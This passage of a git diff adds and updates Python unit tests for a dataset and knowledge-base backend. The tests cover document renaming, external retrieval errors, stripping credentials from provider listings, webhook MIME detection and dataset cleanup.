dict(doc.data_source_info) + doc.doc_metadata = dict(doc_metadata or {}) + return doc + + +def test_rename_document_success(mock_env): + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "New Document Name" + + dataset = make_dataset(dataset_id) + document = make_document(document_id=document_id, dataset_id=dataset_id) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + result = DocumentService.rename_document(dataset_id, document_id, new_name) + + assert result is document + assert document.name == new_name + mock_env["db_session"].add.assert_called_once_with(document) + mock_env["db_session"].commit.assert_called_once() + + +def test_rename_document_with_built_in_fields(mock_env): + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "Renamed" + + dataset = make_dataset(dataset_id, built_in_field_enabled=True) + document = make_document(document_id=document_id, dataset_id=dataset_id, doc_metadata={"foo": "bar"}) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + DocumentService.rename_document(dataset_id, document_id, new_name) + + assert document.name == new_name + # BuiltInField.document_name == "document_name" in service code + assert document.doc_metadata["document_name"] == new_name + assert document.doc_metadata["foo"] == "bar" + + +def test_rename_document_updates_upload_file_when_present(mock_env): + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "Renamed" + file_id = "file-123" + + dataset = make_dataset(dataset_id) + document = make_document( + document_id=document_id, + dataset_id=dataset_id, + data_source_info={"upload_file_id": file_id}, + ) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + # Intercept UploadFile rename UPDATE chain + mock_query = Mock() + mock_query.where.return_value = mock_query + mock_env["db_session"].query.return_value = mock_query + + DocumentService.rename_document(dataset_id, document_id, new_name) + + assert document.name == new_name + mock_env["db_session"].query.assert_called() # update executed + + +def test_rename_document_does_not_update_upload_file_when_missing_id(mock_env): + """ + When data_source_info_dict exists but does not contain "upload_file_id", + UploadFile should not be updated. + """ + dataset_id = "dataset-123" + document_id = "document-123" + new_name = "Another Name" + + dataset = make_dataset(dataset_id) + # Ensure data_source_info_dict is truthy but lacks the key + document = make_document( + document_id=document_id, + dataset_id=dataset_id, + data_source_info={"url": "https://example.com"}, + ) + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + DocumentService.rename_document(dataset_id, document_id, new_name) + + assert document.name == new_name + # Should NOT attempt to update UploadFile + mock_env["db_session"].query.assert_not_called() + + +def test_rename_document_dataset_not_found(mock_env): + mock_env["get_dataset"].return_value = None + + with pytest.raises(ValueError, match="Dataset not found"): + DocumentService.rename_document("missing", "doc", "x") + + +def test_rename_document_not_found(mock_env): + dataset = make_dataset("dataset-123") + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = None + + with pytest.raises(ValueError, match="Document not found"): + DocumentService.rename_document(dataset.id, "missing", "x") + + +def test_rename_document_permission_denied_when_tenant_mismatch(mock_env): + dataset = make_dataset("dataset-123") + # different tenant than current_user.current_tenant_id + document = make_document(dataset_id=dataset.id, tenant_id="tenant-other") + + mock_env["get_dataset"].return_value = dataset + mock_env["get_document"].return_value = document + + with pytest.raises(ValueError, match="No permission"): + DocumentService.rename_document(dataset.id, document.id, "x") diff --git a/api/tests/unit_tests/services/test_external_dataset_service.py b/api/tests/unit_tests/services/test_external_dataset_service.py index c12ea2f7cb..e2d62583f8 100644 --- a/api/tests/unit_tests/services/test_external_dataset_service.py +++ b/api/tests/unit_tests/services/test_external_dataset_service.py @@ -6,6 +6,7 @@ Target: 1500+ lines of comprehensive test coverage. """ import json +import re from datetime import datetime from unittest.mock import MagicMock, Mock, patch @@ -1791,8 +1792,8 @@ class TestExternalDatasetServiceFetchRetrieval: @patch("services.external_knowledge_service.ExternalDatasetService.process_external_api") @patch("services.external_knowledge_service.db") - def test_fetch_external_knowledge_retrieval_non_200_status(self, mock_db, mock_process, factory): - """Test retrieval returns empty list on non-200 status.""" + def test_fetch_external_knowledge_retrieval_non_200_status_raises_exception(self, mock_db, mock_process, factory): + """Test that non-200 status code raises Exception with response text.""" # Arrange binding = factory.create_external_knowledge_binding_mock() api = factory.create_external_knowledge_api_mock() @@ -1817,12 +1818,103 @@ class TestExternalDatasetServiceFetchRetrieval: mock_response = MagicMock() mock_response.status_code = 500 + mock_response.text = "Internal Server Error: Database connection failed" mock_process.return_value = mock_response - # Act - result = ExternalDatasetService.fetch_external_knowledge_retrieval( - "tenant-123", "dataset-123", "query", {"top_k": 5} - ) + # Act & Assert + with pytest.raises(Exception, match="Internal Server Error: Database connection failed"): + ExternalDatasetService.fetch_external_knowledge_retrieval( + "tenant-123", "dataset-123", "query", {"top_k": 5} + ) - # Assert - assert result == [] + @pytest.mark.parametrize( + ("status_code", "error_message"), + [ + (400, "Bad Request: Invalid query parameters"), + (401, "Unauthorized: Invalid API key"), + (403, "Forbidden: Access denied to resource"), + (404, "Not Found: Knowledge base not found"), + (429, "Too Many Requests: Rate limit exceeded"), + (500, "Internal Server Error: Database connection failed"), + (502, "Bad Gateway: External service unavailable"), + (503, "Service Unavailable: Maintenance mode"), + ], + ) + @patch("services.external_knowledge_service.ExternalDatasetService.process_external_api") + @patch("services.external_knowledge_service.db") + def test_fetch_external_knowledge_retrieval_various_error_status_codes( + self, mock_db, mock_process, factory, status_code, error_message + ): + """Test that various error status codes raise exceptions with response text.""" + # Arrange + tenant_id = "tenant-123" + dataset_id = "dataset-123" + + binding = factory.create_external_knowledge_binding_mock( + dataset_id=dataset_id, external_knowledge_api_id="api-123" + ) + api = factory.create_external_knowledge_api_mock(api_id="api-123") + + mock_binding_query = MagicMock() + mock_api_query = MagicMock() + + def query_side_effect(model): + if model == ExternalKnowledgeBindings: + return mock_binding_query + elif model == ExternalKnowledgeApis: + return mock_api_query + return MagicMock() + + mock_db.session.query.side_effect = query_side_effect + + mock_binding_query.filter_by.return_value = mock_binding_query + mock_binding_query.first.return_value = binding + + mock_api_query.filter_by.return_value = mock_api_query + mock_api_query.first.return_value = api + + mock_response = MagicMock() + mock_response.status_code = status_code + mock_response.text = error_message + mock_process.return_value = mock_response + + # Act & Assert + with pytest.raises(ValueError, match=re.escape(error_message)): + ExternalDatasetService.fetch_external_knowledge_retrieval(tenant_id, dataset_id, "query", {"top_k": 5}) + + @patch("services.external_knowledge_service.ExternalDatasetService.process_external_api") + @patch("services.external_knowledge_service.db") + def test_fetch_external_knowledge_retrieval_empty_response_text(self, mock_db, mock_process, factory): + """Test exception with empty response text.""" + # Arrange + binding = factory.create_external_knowledge_binding_mock() + api = factory.create_external_knowledge_api_mock() + + mock_binding_query = MagicMock() + mock_api_query = MagicMock() + + def query_side_effect(model): + if model == ExternalKnowledgeBindings: + return mock_binding_query + elif model == ExternalKnowledgeApis: + return mock_api_query + return MagicMock() + + mock_db.session.query.side_effect = query_side_effect + + mock_binding_query.filter_by.return_value = mock_binding_query + mock_binding_query.first.return_value = binding + + mock_api_query.filter_by.return_value = mock_api_query + mock_api_query.first.return_value = api + + mock_response = MagicMock() + mock_response.status_code = 503 + mock_response.text = "" + mock_process.return_value = mock_response + + # Act & Assert + with pytest.raises(Exception, match=""): + ExternalDatasetService.fetch_external_knowledge_retrieval( + "tenant-123", "dataset-123", "query", {"top_k": 5} + ) diff --git a/api/tests/unit_tests/services/test_model_provider_service_sanitization.py b/api/tests/unit_tests/services/test_model_provider_service_sanitization.py new file mode 100644 index 0000000000..9a107da1c7 --- /dev/null +++ b/api/tests/unit_tests/services/test_model_provider_service_sanitization.py @@ -0,0 +1,88 @@ +import types + +import pytest + +from core.entities.provider_entities import CredentialConfiguration, CustomModelConfiguration +from core.model_runtime.entities.common_entities import I18nObject +from core.model_runtime.entities.model_entities import ModelType +from core.model_runtime.entities.provider_entities import ConfigurateMethod +from models.provider import ProviderType +from services.model_provider_service import ModelProviderService + + +class _FakeConfigurations: + def __init__(self, provider_configuration: types.SimpleNamespace) -> None: + self._provider_configuration = provider_configuration + + def values(self) -> list[types.SimpleNamespace]: + return [self._provider_configuration] + + +@pytest.fixture +def service_with_fake_configurations(): + # Build a fake provider schema with minimal fields used by ProviderResponse + fake_provider = types.SimpleNamespace( + provider="langgenius/openai_api_compatible/openai_api_compatible", + label=I18nObject(en_US="OpenAI API Compatible", zh_Hans="OpenAI API Compatible"), + description=None, + icon_small=None, + icon_small_dark=None, + icon_large=None, + background=None, + help=None, + supported_model_types=[ModelType.LLM], + configurate_methods=[ConfigurateMethod.CUSTOMIZABLE_MODEL], + provider_credential_schema=None, + model_credential_schema=None, + ) + + # Include decrypted credentials to simulate the leak source + custom_model = CustomModelConfiguration( + model="gpt-4o-mini", + model_type=ModelType.LLM, + credentials={"api_key": "sk-plain-text", "endpoint": "https://example.com"}, + current_credential_id="cred-1", + current_credential_name="API KEY 1", + available_model_credentials=[], + unadded_to_model_list=False, + ) + + fake_custom_provider = types.SimpleNamespace( + current_credential_id="cred-1", + current_credential_name="API KEY 1", + available_credentials=[CredentialConfiguration(credential_id="cred-1", credential_name="API KEY 1")], + ) + + fake_custom_configuration = types.SimpleNamespace( + provider=fake_custom_provider, models=[custom_model], can_added_models=[] + ) + + fake_system_configuration = types.SimpleNamespace(enabled=False, current_quota_type=None, quota_configurations=[]) + + fake_provider_configuration = types.SimpleNamespace( + provider=fake_provider, + preferred_provider_type=ProviderType.CUSTOM, + custom_configuration=fake_custom_configuration, + system_configuration=fake_system_configuration, + is_custom_configuration_available=lambda: True, + ) + + class _FakeProviderManager: + def get_configurations(self, tenant_id: str) -> _FakeConfigurations: + return _FakeConfigurations(fake_provider_configuration) + + svc = ModelProviderService() + svc.provider_manager = _FakeProviderManager() + return svc + + +def test_get_provider_list_strips_credentials(service_with_fake_configurations: ModelProviderService): + providers = service_with_fake_configurations.get_provider_list(tenant_id="tenant-1", model_type=None) + + assert len(providers) == 1 + custom_models = providers[0].custom_configuration.custom_models + + assert custom_models is not None + assert len(custom_models) == 1 + # The sanitizer should drop credentials in list response + assert custom_models[0].credentials is None diff --git a/api/tests/unit_tests/services/test_variable_truncator.py b/api/tests/unit_tests/services/test_variable_truncator.py index cf6fb25c1c..ec819ae57a 100644 --- a/api/tests/unit_tests/services/test_variable_truncator.py +++ b/api/tests/unit_tests/services/test_variable_truncator.py @@ -518,6 +518,55 @@ class TestEdgeCases: assert isinstance(result.result, StringSegment) +class TestTruncateJsonPrimitives: + """Test _truncate_json_primitives method with different data types.""" + + @pytest.fixture + def truncator(self): + return VariableTruncator() + + def test_truncate_json_primitives_file_type(self, truncator, file): + """Test that File objects are handled correctly in _truncate_json_primitives.""" + # Test File object is returned as-is without truncation + result = truncator._truncate_json_primitives(file, 1000) + + assert result.value == file + assert result.truncated is False + # Size should be calculated correctly + expected_size = VariableTruncator.calculate_json_size(file) + assert result.value_size == expected_size + + def test_truncate_json_primitives_file_type_small_budget(self, truncator, file): + """Test that File objects are returned as-is even with small budget.""" + # Even with a small size budget, File objects should not be truncated + result = truncator._truncate_json_primitives(file, 10) + + assert result.value == file + assert result.truncated is False + + def test_truncate_json_primitives_file_type_in_array(self, truncator, file): + """Test File objects in arrays are handled correctly.""" + array_with_files = [file, file] + result = truncator._truncate_json_primitives(array_with_files, 1000) + + assert isinstance(result.value, list) + assert len(result.value) == 2 + assert result.value[0] == file + assert result.value[1] == file + assert result.truncated is False + + def test_truncate_json_primitives_file_type_in_object(self, truncator, file): + """Test File objects in objects are handled correctly.""" + obj_with_files = {"file1": file, "file2": file} + result = truncator._truncate_json_primitives(obj_with_files, 1000) + + assert isinstance(result.value, dict) + assert len(result.value) == 2 + assert result.value["file1"] == file + assert result.value["file2"] == file + assert result.truncated is False + + class TestIntegrationScenarios: """Test realistic integration scenarios.""" diff --git a/api/tests/unit_tests/services/test_webhook_service.py b/api/tests/unit_tests/services/test_webhook_service.py index 6afe52d97b..d788657589 100644 --- a/api/tests/unit_tests/services/test_webhook_service.py +++ b/api/tests/unit_tests/services/test_webhook_service.py @@ -82,19 +82,19 @@ class TestWebhookServiceUnit: "/webhook", method="POST", headers={"Content-Type": "multipart/form-data"}, - data={"message": "test", "upload": file_storage}, + data={"message": "test", "file": file_storage}, ): webhook_trigger = MagicMock() webhook_trigger.tenant_id = "test_tenant" with patch.object(WebhookService, "_process_file_uploads") as mock_process_files: - mock_process_files.return_value = {"upload": "mocked_file_obj"} + mock_process_files.return_value = {"file": "mocked_file_obj"} webhook_data = WebhookService.extract_webhook_data(webhook_trigger) assert webhook_data["method"] == "POST" assert webhook_data["body"]["message"] == "test" - assert webhook_data["files"]["upload"] == "mocked_file_obj" + assert webhook_data["files"]["file"] == "mocked_file_obj" mock_process_files.assert_called_once() def test_extract_webhook_data_raw_text(self): @@ -110,6 +110,70 @@ class TestWebhookServiceUnit: assert webhook_data["method"] == "POST" assert webhook_data["body"]["raw"] == "raw text content" + def test_extract_octet_stream_body_uses_detected_mime(self): + """Octet-stream uploads should rely on detected MIME type.""" + app = Flask(__name__) + binary_content = b"plain text data" + + with app.test_request_context( + "/webhook", method="POST", headers={"Content-Type": "application/octet-stream"}, data=binary_content + ): + webhook_trigger = MagicMock() + mock_file = MagicMock() + mock_file.to_dict.return_value = {"file": "data"} + + with ( + patch.object(WebhookService, "_detect_binary_mimetype", return_value="text/plain") as mock_detect, + patch.object(WebhookService, "_create_file_from_binary") as mock_create, + ): + mock_create.return_value = mock_file + body, files = WebhookService._extract_octet_stream_body(webhook_trigger) + + assert body["raw"] == {"file": "data"} + assert files == {} + mock_detect.assert_called_once_with(binary_content) + mock_create.assert_called_once() + args = mock_create.call_args[0] + assert args[0] == binary_content + assert args[1] == "text/plain" + assert args[2] is webhook_trigger + + def test_detect_binary_mimetype_uses_magic(self, monkeypatch): + """python-magic output should be used when available.""" + fake_magic = MagicMock() + fake_magic.from_buffer.return_value = "image/png" + monkeypatch.setattr("services.trigger.webhook_service.magic", fake_magic) + + result = WebhookService._detect_binary_mimetype(b"binary data") + + assert result == "image/png" + fake_magic.from_buffer.assert_called_once() + + def test_detect_binary_mimetype_fallback_without_magic(self, monkeypatch): + """Fallback MIME type should be used when python-magic is unavailable.""" + monkeypatch.setattr("services.trigger.webhook_service.magic", None) + + result = WebhookService._detect_binary_mimetype(b"binary data") + + assert result == "application/octet-stream" + + def test_detect_binary_mimetype_handles_magic_exception(self, monkeypatch): + """Fallback MIME type should be used when python-magic raises an exception.""" + try: + import magic as real_magic + except ImportError: + pytest.skip("python-magic is not installed") + + fake_magic = MagicMock() + fake_magic.from_buffer.side_effect = real_magic.MagicException("magic error") + monkeypatch.setattr("services.trigger.webhook_service.magic", fake_magic) + + with patch("services.trigger.webhook_service.logger") as mock_logger: + result = WebhookService._detect_binary_mimetype(b"binary data") + + assert result == "application/octet-stream" + mock_logger.debug.assert_called_once() + def test_extract_webhook_data_invalid_json(self): """Test webhook data extraction with invalid JSON.""" app = Flask(__name__) diff --git a/api/tests/unit_tests/tasks/test_clean_dataset_task.py b/api/tests/unit_tests/tasks/test_clean_dataset_task.py new file mode 100644 index 0000000000..bace66bec4 --- /dev/null +++ b/api/tests/unit_tests/tasks/test_clean_dataset_task.py @@ -0,0 +1,1232 @@ +""" +Unit tests for clean_dataset_task. + +This module tests the dataset cleanup task functionality including: +- Basic cleanup of documents and segments +- Vector database cleanup with IndexProcessorFactory +- Storage file deletion +- Invalid doc_form handling with default fallback +- Error handling and database session rollback +- Pipeline and workflow deletion +- Segment attachment cleanup +""" + +import uuid +from unittest.mock import MagicMock, patch + +import pytest + +from tasks.clean_dataset_task import clean_dataset_task + +# ============================================================================ +# Fixtures +# ============================================================================ + + +@pytest.fixture +def tenant_id(): + """Generate a unique tenant ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def dataset_id(): + """Generate a unique dataset ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def collection_binding_id(): + """Generate a unique collection binding ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def pipeline_id(): + """Generate a unique pipeline ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def mock_db_session(): + """Mock database session with query capabilities.""" + with patch("tasks.clean_dataset_task.db") as mock_db: + mock_session = MagicMock() + mock_db.session = mock_session + + # Setup query chain + mock_query = MagicMock() + mock_session.query.return_value = mock_query + mock_query.where.return_value = mock_query + mock_query.delete.return_value = 0 + + # Setup scalars for select queries + mock_session.scalars.return_value.all.return_value = [] + + # Setup execute for JOIN queries + mock_session.execute.return_value.all.return_value = [] + + yield mock_db + + +@pytest.fixture +def mock_storage(): + """Mock storage client.""" + with patch("tasks.clean_dataset_task.storage") as mock_storage: + mock_storage.delete.return_value = None + yield mock_storage + + +@pytest.fixture +def mock_index_processor_factory(): + """Mock IndexProcessorFactory.""" + with patch("tasks.clean_dataset_task.IndexProcessorFactory") as mock_factory: + mock_processor = MagicMock() + mock_processor.clean.return_value = None + mock_factory_instance = MagicMock() + mock_factory_instance.init_index_processor.return_value = mock_processor + mock_factory.return_value = mock_factory_instance + + yield { + "factory": mock_factory, + "factory_instance": mock_factory_instance, + "processor": mock_processor, + } + + +@pytest.fixture +def mock_get_image_upload_file_ids(): + """Mock get_image_upload_file_ids function.""" + with patch("tasks.clean_dataset_task.get_image_upload_file_ids") as mock_func: + mock_func.return_value = [] + yield mock_func + + +@pytest.fixture +def mock_document(): + """Create a mock Document object.""" + doc = MagicMock() + doc.id = str(uuid.uuid4()) + doc.tenant_id = str(uuid.uuid4()) + doc.dataset_id = str(uuid.uuid4()) + doc.data_source_type = "upload_file" + doc.data_source_info = '{"upload_file_id": "test-file-id"}' + doc.data_source_info_dict = {"upload_file_id": "test-file-id"} + return doc + + +@pytest.fixture +def mock_segment(): + """Create a mock DocumentSegment object.""" + segment = MagicMock() + segment.id = str(uuid.uuid4()) + segment.content = "Test segment content" + return segment + + +@pytest.fixture +def mock_upload_file(): + """Create a mock UploadFile object.""" + upload_file = MagicMock() + upload_file.id = str(uuid.uuid4()) + upload_file.key = f"test_files/{uuid.uuid4()}.txt" + return upload_file + + +# ============================================================================ +# Test Basic Cleanup +# ============================================================================ + + +class TestBasicCleanup: + """Test cases for basic dataset cleanup functionality.""" + + def test_clean_dataset_task_empty_dataset( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test cleanup of an empty dataset with no documents or segments. + + Scenario: + - Dataset has no documents or segments + - Should still clean vector database and delete related records + + Expected behavior: + - IndexProcessorFactory is called to clean vector database + - No storage deletions occur + - Related records (DatasetProcessRule, etc.) are deleted + - Session is committed and closed + """ + # Arrange + mock_db_session.session.scalars.return_value.all.return_value = [] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_index_processor_factory["factory"].assert_called_once_with("paragraph_index") + mock_index_processor_factory["processor"].clean.assert_called_once() + mock_storage.delete.assert_not_called() + mock_db_session.session.commit.assert_called_once() + mock_db_session.session.close.assert_called_once() + + def test_clean_dataset_task_with_documents_and_segments( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + mock_document, + mock_segment, + ): + """ + Test cleanup of dataset with documents and segments. + + Scenario: + - Dataset has one document and one segment + - No image files in segment content + + Expected behavior: + - Documents and segments are deleted + - Vector database is cleaned + - Session is committed + """ + # Arrange + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [mock_segment], # segments + ] + mock_get_image_upload_file_ids.return_value = [] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_db_session.session.delete.assert_any_call(mock_document) + mock_db_session.session.delete.assert_any_call(mock_segment) + mock_db_session.session.commit.assert_called_once() + + def test_clean_dataset_task_deletes_related_records( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that all related records are deleted. + + Expected behavior: + - DatasetProcessRule records are deleted + - DatasetQuery records are deleted + - AppDatasetJoin records are deleted + - DatasetMetadata records are deleted + - DatasetMetadataBinding records are deleted + """ + # Arrange + mock_query = mock_db_session.session.query.return_value + mock_query.where.return_value = mock_query + mock_query.delete.return_value = 1 + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - verify query.where.delete was called multiple times + # for different models (DatasetProcessRule, DatasetQuery, etc.) + assert mock_query.delete.call_count >= 5 + + +# ============================================================================ +# Test Doc Form Validation +# ============================================================================ + + +class TestDocFormValidation: + """Test cases for doc_form validation and default fallback.""" + + @pytest.mark.parametrize( + "invalid_doc_form", + [ + None, + "", + " ", + "\t", + "\n", + " \t\n ", + ], + ) + def test_clean_dataset_task_invalid_doc_form_uses_default( + self, + invalid_doc_form, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that invalid doc_form values use default paragraph index type. + + Scenario: + - doc_form is None, empty, or whitespace-only + - Should use default IndexStructureType.PARAGRAPH_INDEX + + Expected behavior: + - Default index type is used for cleanup + - No errors are raised + - Cleanup proceeds normally + """ + # Arrange - import to verify the default value + from core.rag.index_processor.constant.index_type import IndexStructureType + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form=invalid_doc_form, + ) + + # Assert - IndexProcessorFactory should be called with default type + mock_index_processor_factory["factory"].assert_called_once_with(IndexStructureType.PARAGRAPH_INDEX) + mock_index_processor_factory["processor"].clean.assert_called_once() + + def test_clean_dataset_task_valid_doc_form_used_directly( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that valid doc_form values are used directly. + + Expected behavior: + - Provided doc_form is passed to IndexProcessorFactory + """ + # Arrange + valid_doc_form = "qa_index" + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form=valid_doc_form, + ) + + # Assert + mock_index_processor_factory["factory"].assert_called_once_with(valid_doc_form) + + +# ============================================================================ +# Test Error Handling +# ============================================================================ + + +class TestErrorHandling: + """Test cases for error handling and recovery.""" + + def test_clean_dataset_task_vector_cleanup_failure_continues( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + mock_document, + mock_segment, + ): + """ + Test that document cleanup continues even if vector cleanup fails. + + Scenario: + - IndexProcessor.clean() raises an exception + - Document and segment deletion should still proceed + + Expected behavior: + - Exception is caught and logged + - Documents and segments are still deleted + - Session is committed + """ + # Arrange + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [mock_segment], # segments + ] + mock_index_processor_factory["processor"].clean.side_effect = Exception("Vector database error") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - documents and segments should still be deleted + mock_db_session.session.delete.assert_any_call(mock_document) + mock_db_session.session.delete.assert_any_call(mock_segment) + mock_db_session.session.commit.assert_called_once() + + def test_clean_dataset_task_storage_delete_failure_continues( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that cleanup continues even if storage deletion fails. + + Scenario: + - Segment contains image file references + - Storage.delete() raises an exception + - Cleanup should continue + + Expected behavior: + - Exception is caught and logged + - Image file record is still deleted from database + - Other cleanup operations proceed + """ + # Arrange + # Need at least one document for segment processing to occur (code is in else block) + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "website" # Non-upload type to avoid file deletion + + mock_segment = MagicMock() + mock_segment.id = str(uuid.uuid4()) + mock_segment.content = "Test content with image" + + mock_upload_file = MagicMock() + mock_upload_file.id = str(uuid.uuid4()) + mock_upload_file.key = "images/test-image.jpg" + + image_file_id = mock_upload_file.id + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents - need at least one for segment processing + [mock_segment], # segments + ] + mock_get_image_upload_file_ids.return_value = [image_file_id] + mock_db_session.session.query.return_value.where.return_value.first.return_value = mock_upload_file + mock_storage.delete.side_effect = Exception("Storage service unavailable") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - storage delete was attempted for image file + mock_storage.delete.assert_called_with(mock_upload_file.key) + # Image file should still be deleted from database + mock_db_session.session.delete.assert_any_call(mock_upload_file) + + def test_clean_dataset_task_database_error_rollback( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that database session is rolled back on error. + + Scenario: + - Database operation raises an exception + - Session should be rolled back to prevent dirty state + + Expected behavior: + - Session.rollback() is called + - Session.close() is called in finally block + """ + # Arrange + mock_db_session.session.commit.side_effect = Exception("Database commit failed") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_db_session.session.rollback.assert_called_once() + mock_db_session.session.close.assert_called_once() + + def test_clean_dataset_task_rollback_failure_still_closes_session( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that session is closed even if rollback fails. + + Scenario: + - Database commit fails + - Rollback also fails + - Session should still be closed + + Expected behavior: + - Session.close() is called regardless of rollback failure + """ + # Arrange + mock_db_session.session.commit.side_effect = Exception("Commit failed") + mock_db_session.session.rollback.side_effect = Exception("Rollback failed") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_db_session.session.close.assert_called_once() + + +# ============================================================================ +# Test Pipeline and Workflow Deletion +# ============================================================================ + + +class TestPipelineAndWorkflowDeletion: + """Test cases for pipeline and workflow deletion.""" + + def test_clean_dataset_task_with_pipeline_id( + self, + dataset_id, + tenant_id, + collection_binding_id, + pipeline_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that pipeline and workflow are deleted when pipeline_id is provided. + + Expected behavior: + - Pipeline record is deleted + - Related workflow record is deleted + """ + # Arrange + mock_query = mock_db_session.session.query.return_value + mock_query.where.return_value = mock_query + mock_query.delete.return_value = 1 + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + pipeline_id=pipeline_id, + ) + + # Assert - verify delete was called for pipeline-related queries + # The actual count depends on total queries, but pipeline deletion should add 2 more + assert mock_query.delete.call_count >= 7 # 5 base + 2 pipeline/workflow + + def test_clean_dataset_task_without_pipeline_id( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that pipeline/workflow deletion is skipped when pipeline_id is None. + + Expected behavior: + - Pipeline and workflow deletion queries are not executed + """ + # Arrange + mock_query = mock_db_session.session.query.return_value + mock_query.where.return_value = mock_query + mock_query.delete.return_value = 1 + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + pipeline_id=None, + ) + + # Assert - verify delete was called only for base queries (5 times) + assert mock_query.delete.call_count == 5 + + +# ============================================================================ +# Test Segment Attachment Cleanup +# ============================================================================ + + +class TestSegmentAttachmentCleanup: + """Test cases for segment attachment cleanup.""" + + def test_clean_dataset_task_with_attachments( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that segment attachments are cleaned up properly. + + Scenario: + - Dataset has segment attachments with associated files + - Both binding and file records should be deleted + + Expected behavior: + - Storage.delete() is called for each attachment file + - Attachment file records are deleted from database + - Binding records are deleted from database + """ + # Arrange + mock_binding = MagicMock() + mock_binding.attachment_id = str(uuid.uuid4()) + + mock_attachment_file = MagicMock() + mock_attachment_file.id = mock_binding.attachment_id + mock_attachment_file.key = f"attachments/{uuid.uuid4()}.pdf" + + # Setup execute to return attachment with binding + mock_db_session.session.execute.return_value.all.return_value = [(mock_binding, mock_attachment_file)] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_called_with(mock_attachment_file.key) + mock_db_session.session.delete.assert_any_call(mock_attachment_file) + 